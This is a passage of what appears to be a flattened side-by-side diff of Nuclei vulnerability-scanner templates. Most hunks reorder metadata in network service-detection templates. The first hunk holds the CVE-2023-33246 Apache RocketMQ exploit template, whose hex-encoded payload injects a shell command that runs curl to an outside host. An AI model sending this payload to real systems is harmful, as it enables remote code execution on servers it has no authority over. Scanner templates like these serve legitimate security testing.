cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2023-33246 cve-id: CVE-2023-33246
cwe-id: CWE-94 cwe-id: CWE-94
epss-score: 0.95581
cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
epss-score: 0.95581
metadata: metadata:
verified: true fofa-query: protocol="rocketmq"
max-request: 2 max-request: 1
vendor: apache
product: rocketmq product: rocketmq
shodan-query: title:"RocketMQ" shodan-query: title:"RocketMQ"
fofa-query: protocol="rocketmq" vendor: apache
verified: true
tags: cve,cve2023,rocketmq,rce,oast,intrusive,network tags: cve,cve2023,rocketmq,rce,oast,intrusive,network
variables: variables:
part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}' part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}'

View File

@ -4,13 +4,13 @@ info:
name: FTP Anonymous Login name: FTP Anonymous Login
author: C3l3si4n,pussycat0x author: C3l3si4n,pussycat0x
severity: medium severity: medium
reference:
- https://tools.ietf.org/html/rfc2577
description: | description: |
Anonymous FTP access allows anyone to access your public_ftp folder, allowing unidentified visitors to download (and possibly upload) files on your website. Anonymous FTP creates the potential for a security hole for hackers and is not recommended. Anonymous FTP access allows anyone to access your public_ftp folder, allowing unidentified visitors to download (and possibly upload) files on your website. Anonymous FTP creates the potential for a security hole for hackers and is not recommended.
tags: network,ftp,default-login reference:
- https://tools.ietf.org/html/rfc2577
metadata: metadata:
max-request: 2 max-request: 1
tags: network,ftp,default-login
tcp: tcp:
- inputs: - inputs:

View File

@ -8,11 +8,11 @@ info:
reference: reference:
- https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/ - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/
classification: classification:
cvss-score: 8.5
cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
tags: network,ftp,default-login,service cvss-score: 8.5
metadata: metadata:
max-request: 2 max-request: 1
tags: network,ftp,default-login,service
tcp: tcp:

View File

@ -13,9 +13,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3 cvss-score: 5.3
cwe-id: CWE-284 cwe-id: CWE-284
tags: network,ldap,default-login,tenable
metadata: metadata:
max-request: 2 max-request: 1
tags: network,ldap,default-login,tenable
tcp: tcp:
- inputs: - inputs:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
OpenWire is the native protocol that Apache ActiveMQ uses. It is designed for performance and size on the wire - sacrificing some ease of implementation with higher performance and reduced network bandwidth as a priority. OpenWire is the native protocol that Apache ActiveMQ uses. It is designed for performance and size on the wire - sacrificing some ease of implementation with higher performance and reduced network bandwidth as a priority.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"ActiveMQ OpenWire transport"
verified: true verified: true
shodan-query: 'product:"ActiveMQ OpenWire transport"'
tags: network,activemq,detect tags: network,activemq,detect
tcp: tcp:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server. Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"Apache ActiveMQ"
verified: true verified: true
shodan-query: 'product:"Apache ActiveMQ"'
tags: network,activemq,oss,detect tags: network,activemq,oss,detect
tcp: tcp:

View File

@ -7,10 +7,10 @@ info:
description: | description: |
Axigen Mail Server was detected. Axigen Mail Server was detected.
metadata: metadata:
max-request: 2
verified: true
fofa-query: app="axigen-Mail-Server" fofa-query: app="axigen-Mail-Server"
max-request: 1
shodan-query: product:"Axigen" shodan-query: product:"Axigen"
verified: true
tags: network,axigen,detect tags: network,axigen,detect
tcp: tcp:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79.
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: product:"Cisco fingerd" shodan-query: product:"Cisco fingerd"
verified: true
tags: network,finger,detect tags: network,finger,detect
tcp: tcp:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
Clam AntiVirus is a free software, cross-platform antimalware toolkit able to detect many types of malware, including viruses. Clam AntiVirus is a free software, cross-platform antimalware toolkit able to detect many types of malware, including viruses.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: port:3310 product:"ClamAV"
verified: true verified: true
shodan-query: 'port:3310 product:"ClamAV"'
tags: network,clamav,detect tags: network,clamav,detect
tcp: tcp:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
Native transport requests (NTR) are any requests made via the CQL Native Protocol. CQL Native Protocol is the way the Cassandra driver communicates with the server. Native transport requests (NTR) are any requests made via the CQL Native Protocol. CQL Native Protocol is the way the Cassandra driver communicates with the server.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: cassandra
verified: true verified: true
shodan-query: "cassandra"
tags: network,cassandra,cql,detect tags: network,cassandra,cql,detect
tcp: tcp:

View File

@ -10,11 +10,10 @@ info:
- http://www.addpac.com/addpac_eng2/down.php?file=505_f16.pdf - http://www.addpac.com/addpac_eng2/down.php?file=505_f16.pdf
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: network,addpac,apos,voip,detect
metadata: metadata:
max-request: 2 max-request: 1
tags: network,addpac,apos,voip,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -9,11 +9,10 @@ info:
- https://datatracker.ietf.org/doc/html/rfc6120 - https://datatracker.ietf.org/doc/html/rfc6120
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: network,jabber,xmpp,messaging,detect
metadata: metadata:
max-request: 2 max-request: 1
tags: network,jabber,xmpp,messaging,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -8,12 +8,11 @@ info:
Microsoft .NET Remoting httpd was detected. Microsoft .NET Remoting httpd was detected.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: product:"MS .NET Remoting httpd" shodan-query: product:"MS .NET Remoting httpd"
verified: true
tags: network,detect,microsoft tags: network,detect,microsoft
tcp: tcp:

View File

@ -6,14 +6,14 @@ info:
severity: low severity: low
description: | description: |
The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext. The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext.
remediation: |
Disable CBC Ciphers.
reference: | reference: |
https://www.tenable.com/plugins/nessus/70658 https://www.tenable.com/plugins/nessus/70658
remediation: |
Disable CBC Ciphers.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"Dropbear sshd"
verified: true verified: true
shodan-query: 'product:"Dropbear sshd"'
tags: network,ssh,dropbear,detect tags: network,ssh,dropbear,detect
tcp: tcp:

View File

@ -10,12 +10,11 @@ info:
- https://nmap.org/nsedoc/scripts/smtp-open-relay.html - https://nmap.org/nsedoc/scripts/smtp-open-relay.html
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: ESMTP
verified: true verified: true
shodan-query: 'ESMTP'
tags: network,detect,smtp,mail tags: network,detect,smtp,mail
tcp: tcp:

View File

@ -6,9 +6,9 @@ info:
severity: info severity: info
description: | description: |
The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information. The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information.
tags: mail,expn,network,detect
metadata: metadata:
max-request: 2 max-request: 1
tags: mail,expn,network,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79.
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: port:"79" action shodan-query: port:"79" action
verified: true
tags: network,finger,detect tags: network,finger,detect
tcp: tcp:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"GNU Inetutils FTPd"
verified: true verified: true
shodan-query: 'product:"GNU Inetutils FTPd"'
tags: network,ftp,smartgateway,gnu,inetutils,detect tags: network,ftp,smartgateway,gnu,inetutils,detect
tcp: tcp:

View File

@ -8,11 +8,10 @@ info:
Gopher service was detected. Gopher service was detected.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: network,gopher,detect
metadata: metadata:
max-request: 2 max-request: 1
tags: network,gopher,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -10,12 +10,11 @@ info:
- https://nmap.org/nsedoc/scripts/db2-das-info.html - https://nmap.org/nsedoc/scripts/db2-das-info.html
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: product:"IBM DB2 Database Server" shodan-query: product:"IBM DB2 Database Server"
verified: true
tags: network,ibm,database,db,db2,detect tags: network,ibm,database,db,db2,detect
tcp: tcp:

View File

@ -8,12 +8,11 @@ info:
IMAP was detected. IMAP was detected.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: imap
verified: true verified: true
shodan-query: 'imap'
tags: network,detect,imap,mail tags: network,detect,imap,mail
tcp: tcp:

View File

@ -8,11 +8,10 @@ info:
iPlanet Messaging Server IMAP protocol was detected. iPlanet Messaging Server IMAP protocol was detected.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2
fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap" fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap"
max-request: 1
tags: network,imap,detect tags: network,imap,detect
tcp: tcp:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: Microsoft FTP Service
verified: true verified: true
shodan-query: "Microsoft FTP Service"
tags: network,ftp,microsoft,detect tags: network,ftp,microsoft,detect
tcp: tcp:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"MikroTik router ftpd"
verified: true verified: true
shodan-query: 'product:"MikroTik router ftpd"'
tags: network,ftp,mikrotik,router,detect tags: network,ftp,mikrotik,router,detect
tcp: tcp:

View File

@ -8,12 +8,11 @@ info:
MikroTik RouterOS API was detected. MikroTik RouterOS API was detected.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: product:"MikroTik RouterOS API Service" shodan-query: product:"MikroTik RouterOS API Service"
verified: true
tags: network,mikrotik,detect tags: network,mikrotik,detect
tcp: tcp:

View File

@ -6,15 +6,14 @@ info:
severity: info severity: info
description: | description: |
MongoDB service was detected. MongoDB service was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
reference: reference:
- https://github.com/orleven/Tentacle - https://github.com/orleven/Tentacle
tags: network,mongodb,detect classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
tags: network,mongodb,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -11,10 +11,10 @@ info:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/50da7ea1-eed7-41f9-ba6a-2aa37f5f1e92 - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/50da7ea1-eed7-41f9-ba6a-2aa37f5f1e92
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554
metadata: metadata:
max-request: 2
verified: true
shodan-query: MSMQ
censys-query: services.service_name:MSMQ censys-query: services.service_name:MSMQ
max-request: 1
shodan-query: MSMQ
verified: true
tags: network,msmq,detect tags: network,msmq,detect
tcp: tcp:

View File

@ -8,12 +8,11 @@ info:
MySQL instance was detected. MySQL instance was detected.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: product:"MySQL" shodan-query: product:"MySQL"
verified: true
tags: network,mysql,db,detect tags: network,mysql,db,detect
tcp: tcp:

View File

@ -6,19 +6,18 @@ info:
severity: info severity: info
description: | description: |
OpenSSH service was detected. OpenSSH service was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
reference: reference:
- http://www.openwall.com/lists/oss-security/2016/08/01/2 - http://www.openwall.com/lists/oss-security/2016/08/01/2
- http://www.openwall.com/lists/oss-security/2018/08/15/5 - http://www.openwall.com/lists/oss-security/2018/08/15/5
- http://seclists.org/fulldisclosure/2016/Jul/51 - http://seclists.org/fulldisclosure/2016/Jul/51
- https://nvd.nist.gov/vuln/detail/CVE-2016-6210 - https://nvd.nist.gov/vuln/detail/CVE-2016-6210
- https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - https://nvd.nist.gov/vuln/detail/CVE-2018-15473
tags: seclists,network,ssh,openssh,detect classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
tags: seclists,network,ssh,openssh,detect
tcp: tcp:
- host: - host:

View File

@ -11,12 +11,11 @@ info:
- https://www.postgresql.org/docs/current/client-authentication-problems.html - https://www.postgresql.org/docs/current/client-authentication-problems.html
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: port:5432 product:"PostgreSQL" shodan-query: port:5432 product:"PostgreSQL"
verified: true
tags: network,postgresql,db,detect tags: network,postgresql,db,detect
tcp: tcp:

View File

@ -10,12 +10,11 @@ info:
- https://nmap.org/nsedoc/scripts/pop3-ntlm-info.html - https://nmap.org/nsedoc/scripts/pop3-ntlm-info.html
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: pop3 port:110
verified: true verified: true
shodan-query: 'pop3 port:110'
tags: network,detect,pop3,mail tags: network,detect,pop3,mail
tcp: tcp:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"ProFTPD"
verified: true verified: true
shodan-query: 'product:"ProFTPD"'
tags: network,ftp,proftpd,detect tags: network,ftp,proftpd,detect
tcp: tcp:

View File

@ -9,9 +9,9 @@ info:
reference: reference:
- https://nmap.org/nsedoc/scripts/amqp-info.html - https://nmap.org/nsedoc/scripts/amqp-info.html
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: product:"RabbitMQ" shodan-query: product:"RabbitMQ"
verified: true
tags: network,rabbitmq,oss,detect tags: network,rabbitmq,oss,detect
tcp: tcp:

View File

@ -8,10 +8,9 @@ info:
Windows Remote Desktop Protocol was detected. Windows Remote Desktop Protocol was detected.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
verified: true verified: true
tags: network,windows,rdp,detect tags: network,windows,rdp,detect

View File

@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 4 max-request: 1
shodan-query: product:"redis" shodan-query: product:"redis"
verified: true verified: true
tags: network,redis,detect tags: network,redis,detect

View File

@ -6,9 +6,9 @@ info:
severity: info severity: info
description: Riak is a distributed NoSQL key-value data store that offers high availability, fault tolerance, operational simplicity, and scalability. description: Riak is a distributed NoSQL key-value data store that offers high availability, fault tolerance, operational simplicity, and scalability.
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: product:"Riak" shodan-query: product:"Riak"
verified: true
tags: network,oss,detect tags: network,oss,detect
tcp: tcp:

View File

@ -8,12 +8,11 @@ info:
reference: https://book.hacktricks.xyz/pentesting/pentesting-rpcbind reference: https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: port:"111" shodan-query: port:"111"
verified: true
tags: network,rpcbind,portmap,detect tags: network,rpcbind,portmap,detect
tcp: tcp:

View File

@ -10,11 +10,10 @@ info:
- https://linux.die.net/man/1/rsync - https://linux.die.net/man/1/rsync
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: network,rsyncd,detect
metadata: metadata:
max-request: 2 max-request: 1
tags: network,rsyncd,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -10,12 +10,11 @@ info:
https://nmap.org/nsedoc/scripts/rtsp-methods.html https://nmap.org/nsedoc/scripts/rtsp-methods.html
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: RTSP/1.0 shodan-query: RTSP/1.0
verified: true
tags: network,rtsp,detect tags: network,rtsp,detect
tcp: tcp:

View File

@ -8,12 +8,12 @@ info:
reference: reference:
- https://www.samba.org/samba/what_is_samba.html - https://www.samba.org/samba/what_is_samba.html
- https://www.samba.org/samba/history/security.html - https://www.samba.org/samba/history/security.html
remediation: Always apply the latest security patch.
classification: classification:
cwe-id: CWE-200 cwe-id: CWE-200
remediation: Always apply the latest security patch.
tags: network,smb,samba,detect
metadata: metadata:
max-request: 2 max-request: 1
tags: network,smb,samba,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -4,11 +4,11 @@ info:
name: SAPRouter Detection name: SAPRouter Detection
author: randomstr1ng author: randomstr1ng
severity: info severity: info
tags: network,sap,detect
description: | description: |
SAProuter is a software application that provides a remote connection between our customer's network and SAP. SAProuter is a software application that provides a remote connection between our customer's network and SAP.
metadata: metadata:
max-request: 2 max-request: 1
tags: network,sap,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -4,11 +4,11 @@ info:
name: SMB Detection name: SMB Detection
author: pussycat0x author: pussycat0x
severity: low severity: low
tags: network,windows,smb,service,detect
description: | description: |
SMB (Server Message Block) is a network-layered protocol mainly used on Windows for sharing files, printers, and communication between network-attached computers. SMB related vulnerabilities can be levaraged to compromise large-scale systems. SMB (Server Message Block) is a network-layered protocol mainly used on Windows for sharing files, printers, and communication between network-attached computers. SMB related vulnerabilities can be levaraged to compromise large-scale systems.
metadata: metadata:
max-request: 2 max-request: 1
tags: network,windows,smb,service,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -4,11 +4,11 @@ info:
name: SMTP Service Detection name: SMTP Service Detection
author: pussycat0x author: pussycat0x
severity: info severity: info
tags: network,service,smtp,detect
description: | description: |
SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks. SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks.
metadata: metadata:
max-request: 2 max-request: 1
tags: network,service,smtp,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
Dropbear is a software package written by Matt Johnston that provides a Secure Shell-compatible server and client. It is designed as a replacement for standard OpenSSH for environments with low memory and processor resources, such as embedded systems Dropbear is a software package written by Matt Johnston that provides a Secure Shell-compatible server and client. It is designed as a replacement for standard OpenSSH for environments with low memory and processor resources, such as embedded systems
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"Dropbear sshd"
verified: true verified: true
shodan-query: 'product:"Dropbear sshd"'
tags: network,ssh,dropbear,detect tags: network,ssh,dropbear,detect
tcp: tcp:

View File

@ -4,11 +4,11 @@ info:
name: STARTTLS Mail Server Detection name: STARTTLS Mail Server Detection
author: r3dg33k author: r3dg33k
severity: info severity: info
tags: mail,starttls,network,detect
description: | description: |
STARTTLS is an email protocol command that tells an email server that an email client, including an email client running in a web browser, wants to turn an existing insecure connection into a secure one. STARTTLS is an email protocol command that tells an email server that an email client, including an email client running in a web browser, wants to turn an existing insecure connection into a secure one.
metadata: metadata:
max-request: 2 max-request: 1
tags: mail,starttls,network,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -7,7 +7,7 @@ info:
description: | description: |
ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server. ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"TeamSpeak 3 ServerQuery" shodan-query: product:"TeamSpeak 3 ServerQuery"
verified: true verified: true
tags: network,service,teamspeak3,detect tags: network,service,teamspeak3,detect

View File

@ -7,9 +7,9 @@ info:
description: | description: |
Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines. Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines.
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: port:23 telnet shodan-query: port:23 telnet
verified: true
tags: network,telnet,detect tags: network,telnet,detect
tcp: tcp:

View File

@ -4,11 +4,11 @@ info:
name: Totemomail SMTP Server Detection name: Totemomail SMTP Server Detection
author: princechaddha author: princechaddha
severity: info severity: info
tags: mail,smtp,network,totemomail,detect
description: | description: |
Totemomail is a comprehensive email solution designed to address all aspects of digital communication security. Totemomail is a comprehensive email solution designed to address all aspects of digital communication security.
metadata: metadata:
max-request: 2 max-request: 1
tags: mail,smtp,network,totemomail,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
vmauthd is the VMWare authentication daemon that is included with many VMWare products, including ESX(i), and Workstation. vmauthd is the VMWare authentication daemon that is included with many VMWare products, including ESX(i), and Workstation.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"VMware Authentication Daemon"
verified: true verified: true
shodan-query: 'product:"VMware Authentication Daemon"'
tags: network,vmware,authenticated,detect tags: network,vmware,authenticated,detect
tcp: tcp:

View File

@ -7,9 +7,9 @@ info:
description: A Virtual Network Computing (VNC) service was detected. description: A Virtual Network Computing (VNC) service was detected.
classification: classification:
cwe-id: CWE-200 cwe-id: CWE-200
tags: network,vnc,service,detect
metadata: metadata:
max-request: 2 max-request: 1
tags: network,vnc,service,detect
tcp: tcp:
- inputs: - inputs:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"Xlight ftpd"
verified: true verified: true
shodan-query: 'product:"Xlight ftpd"'
tags: network,ftp,xlight,detect tags: network,ftp,xlight,detect
tcp: tcp:

View File

@ -10,12 +10,11 @@ info:
- https://nmap.org/nsedoc/scripts/mongodb-info.html - https://nmap.org/nsedoc/scripts/mongodb-info.html
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: mongodb server information shodan-query: mongodb server information
verified: true
tags: network,mongodb,enum tags: network,mongodb,enum
tcp: tcp:

View File

@ -6,12 +6,12 @@ info:
severity: info severity: info
description: | description: |
Niagara Fox Protocol is a building automation protocol used between the Niagara software systems by Tridium. Niagara Fox Protocol is a building automation protocol used between the Niagara software systems by Tridium.
metadata:
max-request: 2
verified: true
